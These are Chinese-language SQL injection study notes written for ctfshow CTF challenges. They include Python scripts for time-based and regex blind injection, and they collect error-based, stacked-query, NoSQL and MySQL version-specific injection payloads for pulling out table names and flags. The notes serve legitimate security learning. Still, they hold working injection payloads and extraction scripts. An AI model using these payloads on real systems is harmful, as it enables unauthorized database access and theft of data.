sql注入学习笔记
时间盲注
题目来自ctfshow
sleep
import requests
url = 'http://50fc47ad-1061-499f-a428-a61b75f95f7b.challenge.ctf.show/api/index.php'
# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
payload = "select flagaa from ctfshow_flagxc"
result = ""
for i in range(1, 50):
head = 32
tail = 127
print(i)
while head < tail:
mid = (head + tail) >> 1
data = {"ip": f"1' or if(ascii(substr({payload}),{i},1))>{mid},sleep(3),1) and '1'='1",
"debug": "0"
}
try:
r = requests.post(url, data, timeout=1.5)
tail = mid
except:
head = mid + 1
if head != 32:
result += chr(head)
else:
print(i)
break
print(result)
print(result)
benchmark
ip=if(ascii(substr(({payload}),{i},1))>{mid},benchmark(1e7,sha1('kradress')),1)
笛卡尔积
ip=if(ascii(substr(({payload}),{i},1))>{mid},(SELECT count(*) FROM information_schema.plugins,information_schema.plugins A,information_schema.collations,information_schema.collations B),1)
正则
concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b
但这种方法在我本地的mysql跑的时候会直接报超时,估计高版本myql的题目应该行不通
get_lock
https://zhuanlan.zhihu.com/p/35245598
首先需要连接方式是mysql_pconnect()持久连接,不然万一连接断开,第一个锁会释放掉,第二个getlock就无法延时了
本地调试可以开两个cmd
第一个select get_lock('biodog',1);
第二个select get_lock('biodog',5);
会发现延时5s
报错注入
bit师傅的文章给的很全了 https://www.xl-bit.cn/index.php/archives/93/
floor + rand + group by :select * from user where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)2))x from
information_schema.tables group by x)a); select * from user where id=1
and (select count() from (select 1 union select null union select
!1)x group by concat((select table_name from information_schema.tables
limit 1),floor(rand(0)*2)));ExtractValue: select * from user where id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit
1)));UpdateXml :select * from user where id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
Name_Const(>5.0.12) :select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;
Join :select * from(select * from mysql.user a join mysql.user b)c; select * from(select * from mysql.user a join mysql.user b
using(Host))c; select * from(select * from mysql.user a join
mysql.user b using(Host,User))c;exp()//mysql5.7貌似不能用 select * from user where id=1 and Exp(~(select * from (select version())a));
geometrycollection()//mysql5.7貌似不能用 select * from user where id=1 and geometrycollection((select * from(select * from(select
user())a)b));multipoint()//mysql5.7貌似不能用 select * from user where id=1 and multipoint((select * from(select * from(select user())a)b));
polygon()//mysql5.7貌似不能用 select * from user where id=1 and polygon((select * from(select * from(select user())a)b));
multipolygon()//mysql5.7貌似不能用 select * from user where id=1 and multipolygon((select * from(select * from(select user())a)b));
linestring()//mysql5.7貌似不能用 select * from user where id=1 and linestring((select * from(select * from(select user())a)b));
multilinestring()//mysql5.7貌似不能用 select * from user where id=1 and multilinestring((select * from(select * from(select user())a)
无列名注入
https://xz.aliyun.com/t/4105
select `4` from (select 1,2,3,4,5,6 union select * from users)
先用1,2,3,4,5,6代替列名,然后select数字即可
内层select结果:
select 1,2,3,4,5,6 union select * from users;
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
| 1 | alias | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
过滤逗号情况下
select a from (select * from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select * from table2)x;
查询重复列报错
select * from ( select * from test as a join test as b ) as c;
#利用join clause返回表的列名的性质,配合外面的Select语句触发重名列错误
select * from ( select * from test as a join test as b using (id) ) as c;
#利用using的性质合并第一个重名列,目的是使用报错注入爆出第二个重名列
nosql
比较重要的也就是利用正则盲注
可以看一下http://rui0.cn/archives/609
import requests
url="http://36f72358-932c-4b6f-b307-84f377207dd4.challenge.ctf.show/api/"
flag=""
for i in range(1,100):
for j in "{-abcdefghijklmnopqrstuvwxyz0123456789}":
payload="^{}.*$".format(flag+j)
data={
'username[$regex]':'flag',
'password[$regex]':payload
}
r=requests.post(url=url,data=data)
if r"\u767b\u9646\u6210\u529f" in r.text:
flag+=j
print(flag)
if j=="}":
exit()
break
堆叠注入
经典就是handler,prepare,alter+rename
参考强网杯随便注
alter+rename
1';ALTER TABLE `1919810931114514` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#
1';RENAME TABLE `words` TO `words2`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#
prepare
1';PREPARE st from concat('s','elect', ' * from `1919810931114514` ');EXECUTE st;#
handler
';handler `1919810931114514` open;handler `1919810931114514` read first#
版本特性
5.7
http://t.zoukankan.com/20175211lyz-p-12358725.html
innodb
MySQL 5.6 及以上版本存在innodb_index_stats,innodb_table_stats两张表,其中包含新建立的库和表
select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();
sys
在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名
//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
//通过表文件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
//包含之前查询记录的表
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
Performance_Schema
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
//包含之前查询记录的表
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
//包含表文件路径的表
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
8.0
https://blog.csdn.net/HBohan/article/details/119757059
information_schema.TABLESPACES_EXTENSIONS >=8.0.21
table
显示表单中的所有列
TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
利用table盲注
已知查询语句为select username from users where id = $id,且有回显
可以利用
id=0 ||('1','s')<(table users limit 1)
id=0 ||('1','sa')<(table users limit 1)
这样的方式爆破出第2列数据,其他数据同理
这里有讲https://blog.csdn.net/qq_38154820/article/details/121369208
import requests
def ord2hex(string):
result = ""
for i in string:
r = hex(ord(i));
r = r.replace('0x','')
result = result+r
return '0x'+result
tables = 'roabcdefghijklmnpqstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ""
for i in range(0,50):
for j in range(110,122):
data = {
'id':"0/**/||('1','%s')<(table/**/users/**/limit/**/1)"%(flag+chr(j)),
}
r = requests.post('http://127.0.0.1/index.php',data=data);
print(data)
if 'string(4)' in r.text:
continue
else:
flag = flag +chr(j-1)
print(flag)
break
if(len(flag)<i):
break
print(flag[:-1]+chr(ord(flag[-1:])+1))
values
VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]
row_constructor_list:
ROW(value_list)[,ROW(value_list)][,...]
value_list:
value[,value][,...]
column_designator:
column_index
构造一行数据
